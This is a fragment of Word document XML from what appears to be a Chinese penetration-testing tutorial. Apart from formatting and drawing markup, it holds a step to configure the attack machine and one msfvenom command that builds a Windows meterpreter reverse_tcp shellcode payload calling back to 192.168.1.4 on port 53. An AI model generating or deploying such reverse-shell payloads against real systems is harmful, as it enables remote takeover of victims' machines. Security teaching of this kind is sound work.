          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>配置攻击机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>msf：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80" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="242" w:lineRule="auto"/>
        <w:ind w:left="1103" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>配置pay</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>load：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="294" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="4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msfvenom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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996c38"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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x86</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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6e7f8f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>‐‐platform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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6e7f8f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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6e7f8f"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>‐p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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6e7f8f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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6e7f8f"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>LHOST=192.16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="22" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8.1.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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6e7f8f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>LPORT=53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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6e7f8f"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>‐f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>raw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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6e7f8f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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6e7f8f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>shellcode.bin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group style="position:absolute;margin-left:522.500pt;margin-top:108.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10450,2170" coordsize="30,370">
        <v:shape style="position:absolute;left:10450;top:2170;width:30;height:370" coordorigin="10450,2170" coordsize="30,370" path="m10472,2192l10472,2192,10472,2192,10472,2192,10472,2193,10472,2193,10472,2193,10472,2193,10472,2193,10472,2193,10472,2193,10472,2193,10472,2193,10472,2193,10472,2193,10472,2193,10472,2193,10472,2193,10472,2194,10472,2194,10472,2194,10472,2194,10472,2194,10472,2195,10472,2195,10472,2195,10472,2196,10472,2196,10472,2197,10472,2197,10472,2198,10472,2198,10472,2199,10472,2199,10472,2200,10472,2201,10472,2201,10472,2202,10472,2203,10472,2204,10472,2205,10472,2206,10472,2207,10472,2208,10472,2209,10472,2210,10472,2211,10472,2213,10472,2214,10472,2215,10472,2217,10472,2218,10472,2220,10472,2222,10472,2223,10472,2225,10472,2227,10472,2229,10472,2231,10472,2233,10472,2235,10472,2237,10472,2240,10472,2242,10472,2244,10472,2247,10472,2250,10472,2252,10472,2255,10472,2258,10472,2261,10472,2264,10472,2267,10472,2270,10472,2273,10472,2277,10472,2280,10472,2284,10472,2287,10472,2291,10472,2295,10472,2299,10472,2303,10472,2307,10472,2311,10472,2316,10472,2320,10472,2325,10472,2329,10472,2334,10472,2339,10472,2344,10472,2349,10472,2354,10472,2360,10472,2365,10472,2371,10472,2376,10472,2382,10472,2388,10472,2394,10472,2400,10472,2407,10472,2413,10472,2420,10472,2426,10472,2433,10472,2440,10472,2447,10472,2454,10472,2462,10472,2469,10472,2477,10472,2484,10472,2492,10472,2500,10472,2508,10472,2517,10472,2525,10472,2534,10472,2543e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:108.500pt;width:455.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,2170" coordsize="9110,370">
        <v:shape style="position:absolute;left:1430;top:2170;width:9110;height:370" coordorigin="1430,2170" coordsize="9110,370" path="m1440,2192l1440,2192,1440,2192,1440,2192,1441,2192,1441,2192,1441,2192,1442,2192,1442,2192,1443,2192,1444,2192,1446,2192,1448,2192,1450,2192,1452,2192,1455,2192,1459,2192,1463,2192,1467,2192,1472,2192,1477,2192,1484,2192,1490,2192,1498,2192,1506,2192,1515,2192,1525,2192,1535,2192,1547,2192,1559,2192,1572,2192,1586,2192,1601,2192,1617,2192,1635,2192,1653,2192,1672,2192,1692,2192,1714,2192,1737,2192,1761,2192,1786,2192,1813,2192,1841,2192,1870,2192,1901,2192,1933,2192,1966,2192,2001,2192,2038,2192,2076,2192,2116,2192,2157,2192,2200,2192,2245,2192,2291,2192,2339,2192,2389,2192,2441,2192,2494,2192,2550,2192,2607,2192,2667,2192,2728,2192,2791,2192,2856,2192,2924,2192,2993,2192,3065,2192,3139,2192,3215,2192,3293,2192,3374,2192,3457,2192,3542,2192,3629,2192,3719,2192,3812,2192,3907,2192,4004,2192,4104,2192,4206,2192,4311,2192,4419,2192,4529,2192,4642,2192,4758,2192,4876,2192,4998,2192,5122,2192,5249,2192,5378,2192,5511,2192,5647,2192,5785,2192,5927,2192,6072,2192,6220,2192,6371,2192,6525,2192,6682,2192,6842,2192,7006,2192,7173,2192,7343,2192,7517,2192,7694,2192,7874,2192,8058,2192,8245,2192,8436,2192,8630,2192,8828,2192,9030,2192,9235,2192,9444,2192,9656,2192,9872,2192,10092,2192,10316,2192,10543,2192,10543,2192,10543,2192,10543,2192,10543,2193,10543,2193,10543,2193,10543,2193,10543,2193,10543,2193,10543,2193,10543,2193,10543,2193,10543,2193,10543,2193,10543,2193,10543,2193,10543,2193,10543,2194,10543,2194,10543,2194,10543,2194,10543,2194,10543,2195,10543,2195,10543,2195,10543,2196,10543,2196,10543,2197,10543,2197,10543,2198,10543,2198,10543,2199,10543,2199,10543,2200,10543,2201,10543,2201,10543,2202,10543,2203,10543,2204,10543,2205,10543,2206,10543,2207,10543,2208,10543,2209,10543,2210,10543,2211,10543,2213,10543,2214,10543,2215,10543,2217,10543,2218,10543,2220,10543,2222,10543,2223,10543,2225,10543,2227,10543,2229,10543,2231,10543,2233,10543,2235,10543,2237,10543,2240,10543,2242,10543,2244,10543,2247,10543,2250,10543,2252,10543,2255,10543,2258,10543,2261,10543,2264,10543,2267,10543,2270,10543,2273,10543,2277,10543,2280,10543,2284,10543,2287,10543,2291,10543,2295,10543,2299,10543,2303,10543,2307,10543,2311,10543,2316,10543,2320,10543,2325,10543,2329,10543,2334,10543,2339,10543,2344,10543,2349,10543,2354,10543,2360,10543,2365,10543,2371,10543,2376,10543,2382,10543,2388,10543,2394,10543,2400,10543,2407,10543,2413,10543,2420,10543,2426,10543,2433,10543,2440,10543,2447,10543,2454,10543,2462,10543,2469,10543,2477,10543,2484,10543,2492,10543,2500,10543,2508,10543,2517,10543,2525,10543,2534,10543,2543,10543,2543,10543,2543,10543,2543,10543,2543,10543,2543,10543,2543,10542,2543,10542,2543,10541,2543,10540,2543,10538,2543,10536,2543,10534,2543,10532,2543,10529,2543,10525,2543,10521,2543,10517,2543,10512,2543,10506,2543,10500,2543,10493,2543,10486,2543,10478,2543,10469,2543,10459,2543,10449,2543,10437,2543,10425,2543,10412,2543,10398,2543,10383,2543,10366,2543,10349,2543,10331,2543,10312,2543,10291,2543,10270,2543,10247,2543,10223,2543,10198,2543,10171,2543,10143,2543,10114,2543,10083,2543,10051,2543,10018,2543,9983,2543,9946,2543,9908,2543,9868,2543,9827,2543,9784,2543,9739,2543,9693,2543,9645,2543,9595,2543,9543,2543,9489,2543,9434,2543,9377,2543,9317,2543,9256,2543,9193,2543,9127,2543,9060,2543,8990,2543,8919,2543,8845,2543,8769,2543,8691,2543,8610,2543,8527,2543,8442,2543,8354,2543,8265,2543,8172,2543,8077,2543,7980,2543,7880,2543,7778,2543,7673,2543,7565,2543,7455,2543,7342,2543,7226,2543,7108,2543,6986,2543,6862,2543,6735,2543,6605,2543,6473,2543,6337,2543,6198,2543,6057,2543,5912,2543,5764,2543,5613,2543,5459,2543,5302,2543,5142,2543,4978,2543,4811,2543,4641,2543,4467,2543,4290,2543,4110,2543,3926,2543,3739,2543,3548,2543,3354,2543,3156,2543,2954,2543,2749,2543,2540,2543,2328,2543,2112,2543,1892,2543,1668,2543,1440,2543,1440,2543,1440,2543,1440,2543,1440,2543,1440,2543,1440,2543,1440,2543,1440,2543,1440,2543,1440,2542,1440,2542,1440,2542,1440,2542,1440,2542,1440,2542,1440,2542,1440,2542,1440,2542,1440,2541,1440,2541,1440,2541,1440,2541,1440,2540,1440,2540,1440,2540,1440,2539,1440,2539,1440,2539,1440,2538,1440,2538,1440,2537,1440,2536,1440,2536,1440,2535,1440,2534,1440,2534,1440,2533,1440,2532,1440,2531,1440,2530,1440,2529,1440,2528,1440,2527,1440,2526,1440,2525,1440,2524,1440,2522,1440,2521,1440,2520,1440,2518,1440,2517,1440,2515,1440,2513,1440,2512,1440,2510,1440,2508,1440,2506,1440,2504,1440,2502,1440,2500,1440,2498,1440,2495,1440,2493,1440,2491,1440,2488,1440,2486,1440,2483,1440,2480,1440,2477,1440,2474,1440,2471,1440,2468,1440,2465,1440,2462,1440,2458,1440,2455,1440,2451,1440,2448,1440,2444,1440,2440,1440,2436,1440,2432,1440,2428,1440,2424,1440,2419,1440,2415,1440,2410,1440,2406,1440,2401,1440,2396,1440,2391,1440,2386,1440,2381,1440,2375,1440,2370,1440,2364,1440,2359,1440,2353,1440,2347,1440,2341,1440,2335,1440,2329,1440,2322,1440,2316,1440,2309,1440,2302,1440,2295,1440,2288,1440,2281,1440,2274,1440,2266,1440,2258,1440,2251,1440,2243,1440,2235,1440,2227,1440,2218,1440,2210,1440,2201,1440,2192e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:108.500pt;width:455.500pt;height:1.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,2170" coordsize="9110,30">
        <v:shape style="position:absolute;left:1430;top:2170;width:9110;height:30" coordorigin="1430,2170" coordsize="9110,30" path="m1440,2199l1440,2199,1440,2199,1440,2199,1441,2199,1441,2199,1441,2199,1442,2199,1442,2199,1443,2199,1444,2199,1446,2199,1448,2199,1450,2199,1452,2199,1455,2199,1459,2199,1463,2199,1467,2199,1472,2199,1477,2199,1484,2199,1490,2199,1498,2199,1506,2199,1515,2199,1525,2199,1535,2199,1547,2199,1559,2199,1572,2199,1586,2199,1601,2199,1617,2199,1635,2199,1653,2199,1672,2199,1692,2199,1714,2199,1737,2199,1761,2199,1786,2199,1813,2199,1841,2199,1870,2199,1901,2199,1933,2199,1966,2199,2001,2199,2038,2199,2076,2199,2116,2199,2157,2199,2200,2199,2245,2199,2291,2199,2339,2199,2389,2199,2441,2199,2494,2199,2550,2199,2607,2199,2667,2199,2728,2199,2791,2199,2856,2199,2924,2199,2993,2199,3065,2199,3139,2199,3215,2199,3293,2199,3374,2199,3457,2199,3542,2199,3629,2199,3719,2199,3812,2199,3907,2199,4004,2199,4104,2199,4206,2199,4311,2199,4419,2199,4529,2199,4642,2199,4758,2199,4876,2199,4998,2199,5122,2199,5249,2199,5378,2199,5511,2199,5647,2199,5785,2199,5927,2199,6072,2199,6220,2199,6371,2199,6525,2199,6682,2199,6842,2199,7006,2199,7173,2199,7343,2199,7517,2199,7694,2199,7874,2199,8058,2199,8245,2199,8436,2199,8630,2199,8828,2199,9030,2199,9235,2199,9444,2199,9656,2199,9872,2199,10092,2199,10316,2199,10543,2199e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:125.500pt;width:455.500pt;height:1.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,2510" coordsize="9110,30">
        <v:shape style="position:absolute;left:1430;top:2510;width:9110;height:30" coordorigin="1430,2510" coordsize="9110,30" path="m1440,2536l1440,2536,1440,2536,1440,2536,1441,2536,1441,2536,1441,2536,1442,2536,1442,2536,1443,2536,1444,2536,1446,2536,1448,2536,1450,2536,1452,2536,1455,2536,1459,2536,1463,2536,1467,2536,1472,2536,1477,2536,1484,2536,1490,2536,1498,2536,1506,2536,1515,2536,1525,2536,1535,2536,1547,2536,1559,2536,1572,2536,1586,2536,1601,2536,1617,2536,1635,2536,1653,2536,1672,2536,1692,2536,1714,2536,1737,2536,1761,2536,1786,2536,1813,2536,1841,2536,1870,2536,1901,2536,1933,2536,1966,2536,2001,2536,2038,2536,2076,2536,2116,2536,2157,2536,2200,2536,2245,2536,2291,2536,2339,2536,2389,2536,2441,2536,2494,2536,2550,2536,2607,2536,2667,2536,2728,2536,2791,2536,2856,2536,2924,2536,2993,2536,3065,2536,3139,2536,3215,2536,3293,2536,3374,2536,3457,2536,3542,2536,3629,2536,3719,2536,3812,2536,3907,2536,4004,2536,4104,2536,4206,2536,4311,2536,4419,2536,4529,2536,4642,2536,4758,2536,4876,2536,4998,2536,5122,2536,5249,2536,5378,2536,5511,2536,5647,2536,5785,2536,5927,2536,6072,2536,6220,2536,6371,2536,6525,2536,6682,2536,6842,2536,7006,2536,7173,2536,7343,2536,7517,2536,7694,2536,7874,2536,8058,2536,8245,2536,8436,2536,8630,2536,8828,2536,9030,2536,9235,2536,9444,2536,9656,2536,9872,2536,10092,2536,10316,2536,10543,2536e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:71.400pt;margin-top:108.600pt;width:453.0pt;height:18.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:522.500pt;margin-top:254.500pt;width:1.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10450,5090" coordsize="30,350">
        <v:shape style="position:absolute;left:10450;top:5090;width:30;height:350" coordorigin="10450,5090" coordsize="30,350" path="m10472,5097l10472,5097,10472,5097,10472,5097,10472,5097,10472,5097,10472,5097,10472,5097,10472,5097,10472,5097,10472,5097,10472,5097,10472,5097,10472,5098,10472,5098,10472,5098,10472,5098,10472,5098,10472,5098,10472,5098,10472,5099,10472,5099,10472,5099,10472,5099,10472,5100,10472,5100,10472,5100,10472,5101,10472,5101,10472,5102,10472,5102,10472,5103,10472,5103,10472,5104,10472,5104,10472,5105,10472,5106,10472,5107,10472,5107,10472,5108,10472,5109,10472,5110,10472,5111,10472,5112,10472,5113,10472,5114,10472,5115,10472,5117,10472,5118,10472,5119,10472,5121,10472,5122,10472,5124,10472,5125,10472,5127,10472,5129,10472,5130,10472,5132,10472,5134,10472,5136,10472,5138,10472,5140,10472,5143,10472,5145,10472,5147,10472,5150,10472,5152,10472,5155,10472,5157,10472,5160,10472,5163,10472,5166,10472,5169,10472,5172,10472,5175,10472,5178,10472,5182,10472,5185,10472,5189,10472,5192,10472,5196,10472,5200,10472,5204,10472,5207,10472,5212,10472,5216,10472,5220,10472,5224,10472,5229,10472,5234,10472,5238,10472,5243,10472,5248,10472,5253,10472,5258,10472,5263,10472,5269,10472,5274,10472,5280,10472,5285,10472,5291,10472,5297,10472,5303,10472,5309,10472,5316,10472,5322,10472,5329,10472,5335,10472,5342,10472,5349,10472,5356,10472,5363,10472,5371,10472,5378,10472,5386,10472,5394,10472,5401,10472,5409,10472,5418,10472,5426,10472,5434e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:253.500pt;width:455.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,5070" coordsize="9110,350">
        <v:shape style="position:absolute;left:1430;top:5070;width:9110;height:350" coordorigin="1430,5070" coordsize="9110,350" path="m1440,5097l1440,5097,1440,5097,1440,5097,1441,5097,1441,5097,1441,5097,1442,5097,1442,5097,1443,5097,1444,5097,1446,5097,1448,5097,1450,5097,1452,5097,1455,5097,1459,5097,1463,5097,1467,5097,1472,5097,1477,5097,1484,5097,1490,5097,1498,5097,1506,5097,1515,5097,1525,5097,1535,5097,1547,5097,1559,5097,1572,5097,1586,5097,1601,5097,1617,5097,1635,5097,1653,5097,1672,5097,1692,5097,1714,5097,1737,5097,1761,5097,1786,5097,1813,5097,1841,5097,1870,5097,1901,5097,1933,5097,1966,5097,2001,5097,2038,5097,2076,5097,2116,5097,2157,5097,2200,5097,2245,5097,2291,5097,2339,5097,2389,5097,2441,5097,2494,5097,2550,5097,2607,5097,2667,5097,2728,5097,2791,5097,2856,5097,2924,5097,2993,5097,3065,5097,3139,5097,3215,5097,3293,5097,3374,5097,3457,5097,3542,5097,3629,5097,3719,5097,3812,5097,3907,5097,4004,5097,4104,5097,4206,5097,4311,5097,4419,5097,4529,5097,4642,5097,4758,5097,4876,5097,4998,5097,5122,5097,5249,5097,5378,5097,5511,5097,5647,5097,5785,5097,5927,5097,6072,5097,6220,5097,6371,5097,6525,5097,6682,5097,6842,5097,7006,5097,7173,5097,7343,5097,7517,5097,7694,5097,7874,5097,8058,5097,8245,5097,8436,5097,8630,5097,8828,5097,9030,5097,9235,5097,9444,5097,9656,5097,9872,5097,10092,5097,10316,5097,10543,5097,10543,5097,10543,5097,10543,5097,10543,5097,10543,5097,10543,5097,10543,5097,10543,5097,10543,5097,10543,5097,10543,5097,10543,5097,10543,5098,10543,5098,10543,5098,10543,5098,10543,5098,10543,5098,10543,5098,10543,5099,10543,5099,10543,5099,10543,5099,10543,5100,10543,5100,10543,5100,10543,5101,10543,5101,10543,5102,10543,5102,10543,5103,10543,5103,10543,5104,10543,5104,10543,5105,10543,5106,10543,5107,10543,5107,10543,5108,10543,5109,10543,5110,10543,5111,10543,5112,10543,5113,10543,5114,10543,5115,10543,5117,10543,5118,10543,5119,10543,5121,10543,5122,10543,5124,10543,5125,10543,5127,10543,5129,10543,5130,10543,5132,10543,5134,10543,5136,10543,5138,10543,5140,10543,5143,10543,5145,10543,5147,10543,5150,10543,5152,10543,5155,10543,5157,10543,5160,10543,5163,10543,5166,10543,5169,10543,5172,10543,5175,10543,5178,10543,5182,10543,5185,10543,5189,10543,5192,10543,5196,10543,5200,10543,5204,10543,5207,10543,5212,10543,5216,10543,5220,10543,5224,10543,5229,10543,5234,10543,5238,10543,5243,10543,5248,10543,5253,10543,5258,10543,5263,10543,5269,10543,5274,10543,5280,10543,5285,10543,5291,10543,5297,10543,5303,10543,5309,10543,5316,10543,5322,10543,5329,10543,5335,10543,5342,10543,5349,10543,5356,10543,5363,10543,5371,10543,5378,10543,5386,10543,5394,10543,5401,10543,5409,10543,5418,10543,5426,10543,5434,10543,5434,10543,5434,10543,5434,10543,5434,10543,5434,10543,5434,10542,5434,10542,5434,10541,5434,10540,5434,10538,5434,10536,5434,10534,5434,10532,5434,10529,5434,10525,5434,10521,5434,10517,5434,10512,5434,10506,5434,10500,5434,10493,5434,10486,5434,10478,5434,10469,5434,10459,5434,10449,5434,10437,5434,10425,5434,10412,5434,10398,5434,10383,5434,10366,5434,10349,5434,10331,5434,10312,5434,10291,5434,10270,5434,10247,5434,10223,5434,10198,5434,10171,5434,10143,5434,10114,5434,10083,5434,10051,5434,10018,5434,9983,5434,9946,5434,9908,5434,9868,5434,9827,5434,9784,5434,9739,5434,9693,5434,9645,5434,9595,5434,9543,5434,9489,5434,9434,5434,9377,5434,9317,5434,9256,5434,9193,5434,9127,5434,9060,5434,8990,5434,8919,5434,8845,5434,8769,5434,8691,5434,8610,5434,8527,5434,8442,5434,8354,5434,8265,5434,8172,5434,8077,5434,7980,5434,7880,5434,7778,5434,7673,5434,7565,5434,7455,5434,7342,5434,7226,5434,7108,5434,6986,5434,6862,5434,6735,5434,6605,5434,6473,5434,6337,5434,6198,5434,6057,5434,5912,5434,5764,5434,5613,5434,5459,5434,5302,5434,5142,5434,4978,5434,4811,5434,4641,5434,4467,5434,4290,5434,4110,5434,3926,5434,3739,5434,3548,5434,3354,5434,3156,5434,2954,5434,2749,5434,2540,5434,2328,5434,2112,5434,1892,5434,1668,5434,1440,5434,1440,5434,1440,5434,1440,5434,1440,5434,1440,5434,1440,5434,1440,5434,1440,5434,1440,5434,1440,5434,1440,5434,1440,5434,1440,5434,1440,5434,1440,5434,1440,5434,1440,5434,1440,5433,1440,5433,1440,5433,1440,5433,1440,5432,1440,5432,1440,5432,1440,5432,1440,5431,1440,5431,1440,5430,1440,5430,1440,5429,1440,5429,1440,5428,1440,5428,1440,5427,1440,5426,1440,5426,1440,5425,1440,5424,1440,5423,1440,5422,1440,5422,1440,5421,1440,5420,1440,5418,1440,5417,1440,5416,1440,5415,1440,5414,1440,5412,1440,5411,1440,5409,1440,5408,1440,5406,1440,5405,1440,5403,1440,5401,1440,5399,1440,5397,1440,5395,1440,5393,1440,5391,1440,5389,1440,5387,1440,5384,1440,5382,1440,5379,1440,5377,1440,5374,1440,5371,1440,5369,1440,5366,1440,5363,1440,5360,1440,5356,1440,5353,1440,5350,1440,5346,1440,5343,1440,5339,1440,5336,1440,5332,1440,5328,1440,5324,1440,5320,1440,5316,1440,5311,1440,5307,1440,5303,1440,5298,1440,5293,1440,5288,1440,5284,1440,5279,1440,5273,1440,5268,1440,5263,1440,5257,1440,5252,1440,5246,1440,5240,1440,5234,1440,5228,1440,5222,1440,5216,1440,5209,1440,5203,1440,5196,1440,5189,1440,5182,1440,5175,1440,5168,1440,5161,1440,5153,1440,5146,1440,5138,1440,5130,1440,5122,1440,5114,1440,5106,1440,5097e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:254.500pt;width:455.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,5090" coordsize="9110,10">
        <v:shape style="position:absolute;left:1430;top:5090;width:9110;height:10" coordorigin="1430,5090" coordsize="9110,10" path="m1440,5104l1440,5104,1440,5104,1440,5104,1441,5104,1441,5104,1441,5104,1442,5104,1442,5104,1443,5104,1444,5104,1446,5104,1448,5104,1450,5104,1452,5104,1455,5104,1459,5104,1463,5104,1467,5104,1472,5104,1477,5104,1484,5104,1490,5104,1498,5104,1506,5104,1515,5104,1525,5104,1535,5104,1547,5104,1559,5104,1572,5104,1586,5104,1601,5104,1617,5104,1635,5104,1653,5104,1672,5104,1692,5104,1714,5104,1737,5104,1761,5104,1786,5104,1813,5104,1841,5104,1870,5104,1901,5104,1933,5104,1966,5104,2001,5104,2038,5104,2076,5104,2116,5104,2157,5104,2200,5104,2245,5104,2291,5104,2339,5104,2389,5104,2441,5104,2494,5104,2550,5104,2607,5104,2667,5104,2728,5104,2791,5104,2856,5104,2924,5104,2993,5104,3065,5104,3139,5104,3215,5104,3293,5104,3374,5104,3457,5104,3542,5104,3629,5104,3719,5104,3812,5104,3907,5104,4004,5104,4104,5104,4206,5104,4311,5104,4419,5104,4529,5104,4642,5104,4758,5104,4876,5104,4998,5104,5122,5104,5249,5104,5378,5104,5511,5104,5647,5104,5785,5104,5927,5104,6072,5104,6220,5104,6371,5104,6525,5104,6682,5104,6842,5104,7006,5104,7173,5104,7343,5104,7517,5104,7694,5104,7874,5104,8058,5104,8245,5104,8436,5104,8630,5104,8828,5104,9030,5104,9235,5104,9444,5104,9656,5104,9872,5104,10092,5104,10316,5104,10543,5104e" filled="f" stroked="t" strokeweight="0.648pt" 